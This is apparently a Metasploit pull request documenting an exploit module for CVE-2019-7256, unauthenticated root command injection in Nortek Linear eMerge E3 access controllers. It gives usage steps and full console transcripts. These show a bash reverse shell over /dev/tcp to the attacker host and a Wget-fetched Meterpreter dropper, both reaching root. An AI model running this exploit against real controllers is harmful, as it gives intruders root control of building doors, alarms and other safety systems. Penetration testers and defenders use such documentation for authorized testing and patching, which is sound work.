Pre-Authenticated Remote Code Execution in Nortek Linear eMerge Access Controller [CVE-2019-7256]

[h00die-gr3y]

Nortek Security & Control, LLC (NSC) is a leader in wireless security, home automation and personal safety systems and devices. The eMerge E3-Series is part of Linear’s access control platform, that delivers entry-level access control to buildings.
It is a web based application where the HTTP web interface is typically exposed to the public internet.

The Linear eMerge E3-Series with firmware versions 1.00-06 and below are vulnerable to an unauthenticated command injection remote root exploit that leverages card_scan_decoder.php.
This can be exploited to inject and execute arbitrary shell commands as the root user through the No and door HTTP GET parameter.
A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges.

Building automation and access control systems are at the heart of many critical infrastructures, and their security is vital.
Executing attacks on these systems may enable unauthenticated attackers to access and manipulate doors, elevators, air-conditioning systems, cameras, boilers, lights, safety alarm systems within a building.

This issue affects all Linear eMerge E3 versions up to and including 1.00-06.

Installing a vulnerable test bed requires a Linear eMerge E3-Series access controller with the vulnerable software loaded.

This module has been tested against a Linear eMerge access controller with the specifications listed below:

• Nortek Linear eMerge E3 Elite access controller
• Firmware: v1.00-03

Verification

• use exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256
• set RHOSTS <TARGET HOSTS>
• set RPORT <port>
• set LHOST <attacker host ip>
• set LPORT <attacker host port>
• set TARGET <0-Unix command or 1-Linux Dropper>
• exploit

You should get a bash shell or meterpreter session depending on the target and payload settings.

Options

No specific options.

Scenarios

Nortek Linear eMerge E3 Elite access controller bash reverse shell

msf6 > use exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > options

Module options (exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine
                                       or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


View the full module info with the info, or info -d command.

msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set rhosts 192.168.100.180
rhosts => 192.168.100.180
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lhost 192.168.100.254
lhost => 192.168.100.7
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lport 4444
lport => 4444
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set target 0
target => 0
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > exploit

[*] Started reverse TCP handler on 192.168.100.254:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.180:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 2 seconds.
[*] Elapsed time: 3.16 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Unix Command with bash -c '0<&179-;exec 179<>/dev/tcp/192.168.100.254/4444;sh <&179 >&179 2>&179'
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:54274) at 2022-12-01 18:51:54 +0000

uname -a
Linux cuckoo 3.14.54 #1 SMP PREEMPT Thu Dec 6 19:08:58 PST 2018 armv7l GNU/Linux
whoami
root
exit

Nortek Linear eMerge E3 Elite access controller meterpreter session

msf6 > use exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256
[*] Using configured payload linux/armle/meterpreter_reverse_tcp
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > options

Module options (exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine
                                       or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (linux/armle/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


View the full module info with the info, or info -d command.

msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set rhosts 192.168.100.180
rhosts => 192.168.100.180
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lhost 192.168.100.254
lhost => 192.168.100.7
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lport 4444
lport => 4444
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set target 1
target => 1
msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > exploit

[*] Started reverse TCP handler on 192.168.100.254:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.180:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 2 seconds.
[*] Elapsed time: 3.18 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Linux Dropper
[*] Using URL: http://192.168.100.254:8080/n6tUft9RrS
[*] Client 127.0.0.1 (Wget) requested /n6tUft9RrS
[*] Sending payload to 127.0.0.1 (Wget)
[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:49448) at 2022-12-01 18:50:26 +0000
[*] Command Stager progress - 100.00% done (125/125 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.100.180
OS           :  (Linux 3.14.54)
Architecture : armv7l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter > getuid
Server username: root

Limitations

Due to the limitations of restricted busybox command implementation on the Linear eMerge E3 Access Controller, only a
few unix command payloads will work such as cmd/unix/reverse_bash or cmd/unix/reverse (telnet).

[h00die-gr3y]

Gents are we still moving on this module?

[gwillcox-r7]

@h00die-gr3y Sorry for the delay most of the team has been out on holiday and we also had end of the year tasks that kept us from getting to this. Will take a look at this today/tomorrow once I've finished reviewing another PR.

[gwillcox-r7]

Alright looks like everything should be good now. Also rebased to make sure there were no merge conflicts and to squash 2 commits down. Will land once tests pass.

[gwillcox-r7]

Woot all tests passed, will land this now. Thanks for your help and time on this PR @h00die-gr3y!

[gwillcox-r7]

Release Notes

An exploit has been added for CVE-2019-7256, an unauthenticated command injection vulnerability in Linear eMerge E3 versions 1.00-06 and below in the No and door parameters of card_scan_decoder.php. Successful exploitation results in RCE as the root user.